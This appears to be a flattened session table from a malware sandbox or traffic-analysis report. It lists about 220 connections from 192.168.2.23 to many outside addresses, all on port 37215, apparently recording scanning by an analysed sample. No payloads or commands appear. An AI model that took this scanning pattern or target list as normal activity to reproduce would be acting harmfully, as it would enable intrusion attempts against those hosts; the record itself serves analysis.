                                          13077192.168.2.2354526157.163.77.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13078192.168.2.236015486.195.236.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13079192.168.2.2360666197.188.74.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13080192.168.2.235839841.154.140.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13081192.168.2.2348216150.250.242.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13082192.168.2.235144041.20.58.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13083192.168.2.2356380197.52.171.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13084192.168.2.2346830157.148.87.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13085192.168.2.2335002157.158.175.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13086192.168.2.2333864197.33.206.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13087192.168.2.2358720157.23.248.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13088192.168.2.2354762172.208.124.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13089192.168.2.234672641.72.239.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13090192.168.2.2357938157.84.114.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13091192.168.2.2355252157.61.130.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13092192.168.2.234288041.33.137.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13093192.168.2.235812834.150.191.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13094192.168.2.2358930128.198.156.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13095192.168.2.2345100197.59.114.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13096192.168.2.235984041.155.196.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13097192.168.2.233463841.79.194.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13098192.168.2.2346868157.229.76.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13099192.168.2.233982694.226.171.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13100192.168.2.235026085.109.208.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13101192.168.2.233554441.17.143.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13102192.168.2.2339494197.50.0.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13103192.168.2.234525641.80.181.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13104192.168.2.234902241.230.202.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13105192.168.2.2347576157.180.114.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13106192.168.2.23546665.28.212.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13107192.168.2.2355224157.123.168.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13108192.168.2.2349688165.137.42.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13109192.168.2.234252441.39.182.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13110192.168.2.234870241.54.199.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13111192.168.2.2349964157.23.99.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13112192.168.2.2349572197.167.159.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13113192.168.2.233904041.200.16.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13114192.168.2.2337506197.226.191.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13115192.168.2.233772241.110.124.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13116192.168.2.2337776197.32.153.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13117192.168.2.2346868197.39.60.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13118192.168.2.2336846166.241.41.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13119192.168.2.2355762197.43.2.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13120192.168.2.236086441.101.16.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13121192.168.2.2348286197.219.3.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13122192.168.2.234808241.41.218.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13123192.168.2.2342118155.106.14.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13124192.168.2.2359094157.90.82.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13125192.168.2.2352354197.95.56.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13126192.168.2.2359642204.196.101.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13127192.168.2.236014841.222.98.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13128192.168.2.2352302157.198.16.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13129192.168.2.235806441.249.216.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13130192.168.2.235686824.15.8.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13131192.168.2.2346866132.246.1.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13132192.168.2.233282887.140.195.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13133192.168.2.235392841.250.52.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13134192.168.2.2353626157.197.209.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13135192.168.2.234529877.190.92.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13136192.168.2.2350706157.244.96.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13137192.168.2.2338252157.111.137.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13138192.168.2.2341854126.221.86.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13139192.168.2.2356044168.82.195.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13140192.168.2.2339532197.101.22.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13141192.168.2.2350304197.223.197.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13142192.168.2.235792441.183.137.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13143192.168.2.2342442145.25.30.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13144192.168.2.234092241.135.48.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13145192.168.2.2344352157.246.114.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13146192.168.2.2359868157.17.85.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13147192.168.2.2347438157.237.19.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13148192.168.2.234841241.200.56.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13149192.168.2.23419645.129.10.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13150192.168.2.235332841.193.80.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13151192.168.2.2341832157.70.192.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13152192.168.2.2346724197.8.206.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13153192.168.2.2347020197.64.241.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13154192.168.2.235485641.212.86.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13155192.168.2.235198084.11.233.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13156192.168.2.2342660153.208.123.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13157192.168.2.2353772157.209.63.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13158192.168.2.2351224113.6.51.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13159192.168.2.2342908197.123.126.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13160192.168.2.2337140157.192.234.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13161192.168.2.2334984144.173.230.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13162192.168.2.2351094197.103.216.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13163192.168.2.234937076.105.61.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13164192.168.2.234044441.59.164.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13165192.168.2.2338572218.229.131.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13166192.168.2.233502865.98.217.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13167192.168.2.2346254223.209.190.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13168192.168.2.2354282197.194.45.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13169192.168.2.234450241.140.242.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13170192.168.2.2343042197.219.107.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13171192.168.2.2348782157.6.17.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13172192.168.2.2352272197.188.2.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13173192.168.2.233990641.213.39.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13174192.168.2.2343522157.200.202.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13175192.168.2.2355838157.118.192.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13176192.168.2.2357966157.228.166.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13177192.168.2.2341548157.32.110.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13178192.168.2.2334854157.161.248.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13179192.168.2.2334348197.78.18.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13180192.168.2.2342348131.86.131.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13181192.168.2.234974694.240.123.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13182192.168.2.2333166157.54.41.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13183192.168.2.235951423.238.38.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13184192.168.2.2354154197.127.95.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13185192.168.2.2339062157.187.161.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13186192.168.2.2334394197.89.192.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13187192.168.2.2343368157.172.26.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13188192.168.2.235588041.243.167.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13189192.168.2.235152041.147.41.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13190192.168.2.235342848.79.68.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13191192.168.2.2347586148.67.11.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13192192.168.2.2344986197.243.184.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13193192.168.2.2344910157.182.156.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13194192.168.2.2332854157.97.131.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13195192.168.2.2343626197.79.250.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13196192.168.2.234038441.244.46.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13197192.168.2.2335226197.56.18.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13198192.168.2.2353612157.209.158.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13199192.168.2.2357722157.222.200.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13200192.168.2.234550241.234.175.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13201192.168.2.2338148197.95.157.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13202192.168.2.2351194157.133.184.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13203192.168.2.2341572157.180.162.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13204192.168.2.2333540157.134.72.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13205192.168.2.235952241.194.88.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13206192.168.2.234262241.79.79.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13207192.168.2.2353960197.246.92.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13208192.168.2.2356710157.183.196.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13209192.168.2.2351278157.176.185.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13210192.168.2.2358764157.92.6.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13211192.168.2.2335036197.109.189.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13212192.168.2.236047641.133.6.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13213192.168.2.2340506197.65.36.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13214192.168.2.2355554157.93.138.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13215192.168.2.2348816157.226.137.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13216192.168.2.235811841.7.234.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13217192.168.2.233575641.30.199.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13218192.168.2.2357480157.59.21.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13219192.168.2.2338286197.83.58.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13220192.168.2.234214841.232.71.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13221192.168.2.2358880197.51.36.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13222192.168.2.2348486157.249.28.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13223192.168.2.233623441.3.220.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13224192.168.2.235586441.148.112.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13225192.168.2.2345244129.2.103.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13226192.168.2.2337890197.227.144.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13227192.168.2.233650441.163.205.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13228192.168.2.2336938197.162.20.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13229192.168.2.2360942157.116.210.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13230192.168.2.2336544158.21.142.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13231192.168.2.2342230157.64.108.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13232192.168.2.2336748212.217.93.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13233192.168.2.2345000197.54.74.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13234192.168.2.2354756157.102.30.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13235192.168.2.2340960157.27.69.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13236192.168.2.2335996203.243.132.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13237192.168.2.234175841.6.177.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13238192.168.2.233395241.118.90.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13239192.168.2.2342882157.239.42.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13240192.168.2.2359488111.41.157.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13241192.168.2.2354232157.166.116.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13242192.168.2.2341360197.148.17.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13243192.168.2.2347726197.187.234.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13244192.168.2.2360906197.227.204.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13245192.168.2.2335708160.211.133.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13246192.168.2.2340504157.48.70.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13247192.168.2.235815459.12.246.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13248192.168.2.2352826197.35.193.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13249192.168.2.2354660157.216.187.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13250192.168.2.234444041.139.74.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13251192.168.2.2333474157.104.69.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13252192.168.2.2354834197.106.162.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13253192.168.2.235495841.151.143.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13254192.168.2.235650841.237.182.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13255192.168.2.2352578103.211.164.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13256192.168.2.236075241.154.229.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13257192.168.2.235713041.22.31.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13258192.168.2.2352532197.225.165.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13259192.168.2.234861441.200.150.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13260192.168.2.2351990157.219.197.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13261192.168.2.235413641.130.192.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13262192.168.2.236011227.193.245.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13263192.168.2.2349846157.1.199.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13264192.168.2.233464241.61.205.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13265192.168.2.2340862152.234.205.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13266192.168.2.2352528197.191.46.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13267192.168.2.2346796112.230.165.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13268192.168.2.2341104157.186.248.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13269192.168.2.2341622157.255.66.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13270192.168.2.235096241.60.232.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13271192.168.2.235059241.89.145.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13272192.168.2.2337162197.113.154.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13273192.168.2.2335880192.182.142.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13274192.168.2.2337700197.114.93.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13275192.168.2.2360866157.40.143.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13276192.168.2.2341066102.105.155.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13277192.168.2.234018457.141.105.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13278192.168.2.234790641.168.62.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13279192.168.2.2343414197.155.2.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13280192.168.2.235375641.96.110.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13281192.168.2.2346756197.106.198.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13282192.168.2.2338880157.88.179.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13283192.168.2.2345060157.228.150.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13284192.168.2.234294041.9.136.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13285192.168.2.2350180197.184.49.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13286192.168.2.2339382197.144.107.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13287192.168.2.2358612132.214.28.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13288192.168.2.2360262157.191.50.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13289192.168.2.2351710197.114.121.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13290192.168.2.2352180157.74.241.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13291192.168.2.233693641.108.86.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13292192.168.2.235968841.234.186.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13293192.168.2.235534841.193.37.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13294192.168.2.235139281.86.67.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13295192.168.2.2353934197.203.203.4137215
